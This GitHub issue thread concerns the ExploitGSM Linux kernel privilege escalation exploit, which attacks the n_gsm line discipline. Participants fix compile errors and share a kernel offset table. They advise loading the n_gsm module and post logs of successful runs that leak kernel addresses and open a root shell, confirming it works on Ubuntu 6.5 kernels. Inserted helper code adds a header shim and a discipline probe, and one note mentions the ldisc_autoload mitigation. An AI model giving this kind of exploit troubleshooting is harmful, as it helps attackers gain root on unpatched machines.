
Compile issue in ubuntu #6

Closed
kronostitanplay opened this issue Apr 10, 2024 · 12 comments

Comments

@kronostitanplay

kronostitanplay commented Apr 10, 2024

Error during make.

error: field ‘config’ has incomplete type
  228 |     struct gsm_dlci_config config;
      |                            ^~~~~~
In file included from /usr/include/x86_64-linux-gnu/asm/ioctl.h:1,
                 from /usr/include/linux/ioctl.h:5,
                 from /usr/include/linux/gsmmux.h:6,
                 from /home/kronosplay/Desktop/ExploitGSM/ExploitGSM_6_5/main.c:7:
/home/kronosplay/Desktop/ExploitGSM/ExploitGSM_6_5/main.c: In function ‘thread_setconf_dlci’:
/home/kronosplay/Desktop/ExploitGSM/ExploitGSM_6_5/main.c:54:46: error: invalid application of ‘sizeof’ to incomplete type ‘struct gsm_dlci_config’
   54 | #define GSMIOC_SETCONF_DLCI     _IOW('G', 8, struct gsm_dlci_config)
      |                                              ^~~~~~
/home/kronosplay/Desktop/ExploitGSM/ExploitGSM_6_5/main.c:1137:42: note: in expansion of macro ‘GSMIOC_SETCONF_DLCI’
 1137 |     args->retval = ioctl(args->fd_input, GSMIOC_SETCONF_DLCI, &args->config);
      |                                          ^~~~~~~~~~~~~~~~~~~
/home/kronosplay/Desktop/ExploitGSM/ExploitGSM_6_5/main.c: In function ‘thread_getconf_dlci’:
/home/kronosplay/Desktop/ExploitGSM/ExploitGSM_6_5/main.c:53:47: error: invalid application of ‘sizeof’ to incomplete type ‘struct gsm_dlci_config’
   53 | #define GSMIOC_GETCONF_DLCI     _IOWR('G', 7, struct gsm_dlci_config)
      |                                               ^~~~~~
/home/kronosplay/Desktop/ExploitGSM/ExploitGSM_6_5/main.c:1146:42: note: in expansion of macro ‘GSMIOC_GETCONF_DLCI’
 1146 |     args->retval = ioctl(args->fd_input, GSMIOC_GETCONF_DLCI, &args->config);
      |                                          ^~~~~~~~~~~~~~~~~~~
gmake[2]: *** [CMakeFiles/ExploitGSM.dir/build.make:76: CMakeFiles/ExploitGSM.dir/main.c.o] Error 1
gmake[1]: *** [CMakeFiles/Makefile2:83: CMakeFiles/ExploitGSM.dir/all] Error 2
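The "incomplete type" error above is what you get when main.c is built against a userspace header set that predates the gsmmux additions in Linux 6.5: Ubuntu 22.04 ships 5.15-era `linux-libc-dev`, so `<linux/gsmmux.h>` has no `struct gsm_dlci_config` and `_IOW('G', 8, struct gsm_dlci_config)` cannot take its `sizeof`. The following stand-alone C program is an added example, not code from the ExploitGSM repository: it supplies the struct and the two ioctl numbers only when the installed header lacks them, and decodes the resulting request numbers so they can be checked. The struct layout is copied from the 6.5 uapi header and should be verified against the tree of the kernel you actually target.

```c
/*
 * Added example, not code from the ExploitGSM repository.
 *
 * Linux 6.5 added struct gsm_dlci_config and the GSMIOC_{GET,SET}CONF_DLCI
 * ioctls to <linux/gsmmux.h>.  Ubuntu 22.04 builds against 5.15-era
 * linux-libc-dev, where the struct is undeclared, so
 * _IOW('G', 8, struct gsm_dlci_config) fails with
 * "invalid application of 'sizeof' to incomplete type".
 * The guard below supplies the definition only when the system header lacks it.
 */
#include <stddef.h>
#include <stdio.h>
#include <linux/types.h>
#include <linux/ioctl.h>
#include <linux/gsmmux.h>

#ifndef GSMIOC_GETCONF_DLCI
/* Layout as in the 6.5 uapi header (include/uapi/linux/gsmmux.h); check it
 * against the header of the kernel you target before trusting it. */
struct gsm_dlci_config {
	__u32 channel;      /* DLC (channel) number */
	__u32 adaption;     /* convergence layer type */
	__u32 mtu;          /* maximum transfer unit */
	__u32 priority;     /* 0 = default */
	__u32 i;            /* frame type: 1 = UIH, 0 = UI */
	__u32 k;            /* window size, 0 = default */
	__u32 reserved[8];  /* must be zero */
};
#define GSMIOC_GETCONF_DLCI _IOWR('G', 7, struct gsm_dlci_config)
#define GSMIOC_SETCONF_DLCI _IOW('G', 8, struct gsm_dlci_config)
#endif

/* The four fields the kernel packs into an ioctl request number. */
struct ioc_fields {
	unsigned int dir;   /* _IOC_NONE / _IOC_WRITE / _IOC_READ */
	unsigned int type;  /* 'G' for the gsmmux family */
	unsigned int nr;    /* command number within the family */
	unsigned int size;  /* sizeof the argument struct */
};

/* Decode a request number so a locally supplied constant can be compared
 * with strace output or with the header from the kernel tree you target. */
struct ioc_fields decode_ioc(unsigned long req)
{
	struct ioc_fields f = {
		.dir  = _IOC_DIR(req),
		.type = _IOC_TYPE(req),
		.nr   = _IOC_NR(req),
		.size = _IOC_SIZE(req),
	};
	return f;
}

/* Size the kernel expects the ioctl argument to have (14 x u32 = 56 bytes). */
size_t dlci_config_size(void)
{
	return sizeof(struct gsm_dlci_config);
}

int main(void)
{
	struct ioc_fields s = decode_ioc(GSMIOC_SETCONF_DLCI);
	struct ioc_fields g = decode_ioc(GSMIOC_GETCONF_DLCI);

	printf("sizeof(struct gsm_dlci_config) = %zu\n", dlci_config_size());
	printf("GSMIOC_SETCONF_DLCI = 0x%lx (dir=%u type='%c' nr=%u size=%u)\n",
	       (unsigned long)GSMIOC_SETCONF_DLCI, s.dir, s.type, s.nr, s.size);
	printf("GSMIOC_GETCONF_DLCI = 0x%lx (dir=%u type='%c' nr=%u size=%u)\n",
	       (unsigned long)GSMIOC_GETCONF_DLCI, g.dir, g.type, g.nr, g.size);
	return 0;
}
```

The `#ifndef GSMIOC_GETCONF_DLCI` guard is the right key to test because the 6.5 header defines that macro together with the struct; guarding on the struct tag itself is not possible in C. If the decoded size ever differs from what the kernel expects, the ioctl returns `-ENOTTY`/`-EINVAL` rather than silently copying a short buffer, so comparing the decoded fields against `strace -e ioctl` output on the target is a cheap sanity check.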

@faveoled

faveoled commented Apr 10, 2024

what's your kernel version?

@kronostitanplay
Author

6.5.0-26-generic #26~22.04.1-Ubuntu SMP PREEMPT_DYNAMIC Tue Mar 12 10:22:43 UTC 2 x86_64 x86_64 x86_64 GNU/Linux

@xpliz

xpliz commented Apr 10, 2024

Can't compile in ubuntu 6.5.0-17 nor 6.5.0-23. Same goes for Debian 12.

Removing last commit from ./ExploitGSM_6_5/main.c "works", and exploit compiles but will not run/do anything.

./ExploitGSM ubuntu
Error find kernel 

@YuriiCrimson
Owner

> Can't compile in ubuntu 6.5.0-17 nor 6.5.0-23. Same goes for Debian 12.
>
> Removing last commit from ./ExploitGSM_6_5/main.c "works", and exploit compiles but will not run/do anything.
>
> ./ExploitGSM ubuntu
> Error find kernel

You should use the Offset generator for adding kernel offsets.

@faveoled

faveoled commented Apr 10, 2024

These lines should be changed with offset generator output (run it as root, change distro_name as needed):

struct kernel_table kernels_offsets[] = {
{"ubuntu", "6.5.0-25-generic", false, false, false, true, false, 0x26933c0, 0x3910d00, 0xa22630, 0x1274c0, 0x133eb0, 0x1120a20},
{"fedora", "6.5.6-300.fc39.x86_64", false, false, false, true, false, 0x2ad7eb0, 0x3cfcc60, 0x9b4a30, 0x13c3d0, 0x148780, 0xfbbe20}
};

Worked on my KDE Neon, main.c commit reverted:

neon@neon:~/Downloads/ExploitGSM/ExploitGSM_6_5$ ./ExploitGSM ubuntu
permissible spray -> 500 
begin try leak startup_xen! 
startup_xen leaked address  -> ffffffff8ea933a0 
text leaked address         -> ffffffff8c400000 
lockdep_map_size     -> 32 
spinlock_t_size      -> 4 
mutex_size           -> 32 
tty port             -> 376 
tty buffhead         -> 136 
dead                 -> 524 
waiting setconf dlci thread 
Wait 3 sec for ending kernel work execution 
We get root, spawn shell 
To run a command as administrator (user "root"), use "sudo <command>".
See "man sudo_root" for details.

root@neon:/root# ^C        
neon@neon:~/Downloads/ExploitGSM/ExploitGSM_6_5$ uname -a
Linux neon 6.5.0-21-generic #21~22.04.1-Ubuntu SMP PREEMPT_DYNAMIC Fri Feb  9 13:32:52 UTC 2 x86_64 x86_64 x86_64 GNU/Linux

@kronostitanplay
Author

After updating the kernel offsets:

permissible spray -> 500 
begin try leak startup_xen! 
startup_xen leaked address  -> ffffffffaaa933a0 
text leaked address         -> ffffffffa8400000 
lockdep_map_size     -> 32 
spinlock_t_size      -> 4 
mutex_size           -> 32 
tty port             -> 376 
tty buffhead         -> 136 
dead                 -> 524 
Error set line discipline N_GSM, Invalid argument 

@YuriiCrimson
Owner

> After updating the kernel offsets:
>
> permissible spray -> 500
> begin try leak startup_xen!
> startup_xen leaked address  -> ffffffffaaa933a0
> text leaked address         -> ffffffffa8400000
> lockdep_map_size     -> 32
> spinlock_t_size      -> 4
> mutex_size           -> 32
> tty port             -> 376
> tty buffhead         -> 136
> dead                 -> 524
> Error set line discipline N_GSM, Invalid argument

Because you do not have the n_gsm kernel module. Install the extra kernel modules.
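"Invalid argument" from the line-discipline switch is the kernel telling you that discipline 21 (N_GSM, spelled `N_GSM0710` in the uapi header) is neither registered nor loadable: `TIOCSETD` goes through `tty_ldisc_get()`, which tries `request_module("tty-ldisc-21")` and returns `EINVAL` if n_gsm still is not there. On Ubuntu the module lives in `linux-modules-extra-$(uname -r)`, which is what the reply above refers to. The program below is an added example, not code from the ExploitGSM repository: it probes whether a discipline can be attached to a fresh pty master and distinguishes the missing-module case from the hardened case where `dev.tty.ldisc_autoload=0` makes the same call fail with `EPERM` for unprivileged users.

```c
/*
 * Added example, not code from the ExploitGSM repository.
 *
 * Probe whether a tty line discipline can be attached.  The kernel resolves
 * TIOCSETD through tty_ldisc_get(): if the discipline is not registered it
 * tries request_module("tty-ldisc-<n>") and returns EINVAL when that does
 * not make it available.  On Ubuntu n_gsm.ko ships in
 * linux-modules-extra-$(uname -r); without it you get exactly the exploit's
 * "Error set line discipline N_GSM, Invalid argument".  A box with
 * dev.tty.ldisc_autoload=0 returns EPERM to callers without CAP_SYS_MODULE.
 */
#define _XOPEN_SOURCE 700
#include <errno.h>
#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/ioctl.h>
#include <unistd.h>
#include <linux/tty.h>   /* N_TTY, N_GSM0710 (uapi name of the N_GSM discipline, 21) */

enum ldisc_probe {
	LDISC_ERROR = -1,          /* the probe itself could not run */
	LDISC_MISSING = 0,         /* EINVAL: not registered and not loadable */
	LDISC_OK = 1,              /* attached successfully */
	LDISC_AUTOLOAD_DENIED = 2  /* EPERM: ldisc_autoload=0 and no CAP_SYS_MODULE */
};

/* Map the errno TIOCSETD left behind onto a probe result. */
enum ldisc_probe classify_setd_errno(int err)
{
	switch (err) {
	case EINVAL: return LDISC_MISSING;
	case EPERM:  return LDISC_AUTOLOAD_DENIED;
	default:     return LDISC_ERROR;
	}
}

/* Open a fresh pty master, try to attach `ldisc`, then restore N_TTY so
 * close() tears the tty down through the default discipline. */
enum ldisc_probe probe_ldisc(int ldisc)
{
	int fd = posix_openpt(O_RDWR | O_NOCTTY);
	if (fd < 0)
		return LDISC_ERROR;

	enum ldisc_probe result;
	if (ioctl(fd, TIOCSETD, &ldisc) == 0) {
		int ntty = N_TTY;
		(void)ioctl(fd, TIOCSETD, &ntty);
		result = LDISC_OK;
	} else {
		result = classify_setd_errno(errno);
	}
	close(fd);
	return result;
}

const char *probe_name(enum ldisc_probe r)
{
	switch (r) {
	case LDISC_OK:              return "available";
	case LDISC_MISSING:         return "missing (EINVAL)";
	case LDISC_AUTOLOAD_DENIED: return "autoload denied (EPERM)";
	default:                    return "probe error";
	}
}

int main(void)
{
	printf("N_TTY:     %s\n", probe_name(probe_ldisc(N_TTY)));
	printf("N_GSM0710: %s\n", probe_name(probe_ldisc(N_GSM0710)));
	return 0;
}
```

`cat /proc/tty/ldiscs` lists the disciplines currently registered; n_gsm only appears there once the module has been loaded, so a successful probe followed by that listing confirms the autoload path worked. From the defensive side, the `EPERM` branch is the one you want to see on machines that have no business speaking GSM 07.10: `sysctl dev.tty.ldisc_autoload=0` (or blacklisting n_gsm) denies this primitive to unprivileged users without touching the rest of the tty layer.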

@kronostitanplay
Author

> > After updating the kernel offsets:
> >
> > permissible spray -> 500
> > begin try leak startup_xen!
> > startup_xen leaked address  -> ffffffffaaa933a0
> > text leaked address         -> ffffffffa8400000
> > lockdep_map_size     -> 32
> > spinlock_t_size      -> 4
> > mutex_size           -> 32
> > tty port             -> 376
> > tty buffhead         -> 136
> > dead                 -> 524
> > Error set line discipline N_GSM, Invalid argument
>
> Because you do not have the n_gsm kernel module. Install the extra kernel modules.

Thanks, it works.

permissible spray -> 500 
begin try leak startup_xen! 
startup_xen leaked address  -> ffffffff9e0933a0 
text leaked address         -> ffffffff9ba00000 
lockdep_map_size     -> 32 
spinlock_t_size      -> 4 
mutex_size           -> 32 
tty port             -> 376 
tty buffhead         -> 136 
dead                 -> 524 
waiting setconf dlci thread 
Wait 3 sec for ending kernel work execution 
We get root, spawn shell 
To run a command as administrator (user "root"), use "sudo <command>".
See "man sudo_root" for details.

@YuriiCrimson
Owner

YuriiCrimson commented Apr 10, 2024

Try my other exploit for Debian 12.

@faveoled

@kronostitanplay Could you update your system to see if it works on 6.5.0-27?

@psreverttoself

> @kronostitanplay Could you update your system to see if it works on 6.5.0-27?

Hi, I have confirmed this works on Ubuntu 22 LTS with kernel 6.5.0-27.

@kronostitanplay
Author

> @kronostitanplay Could you update your system to see if it works on 6.5.0-27?

Yes! It's working.
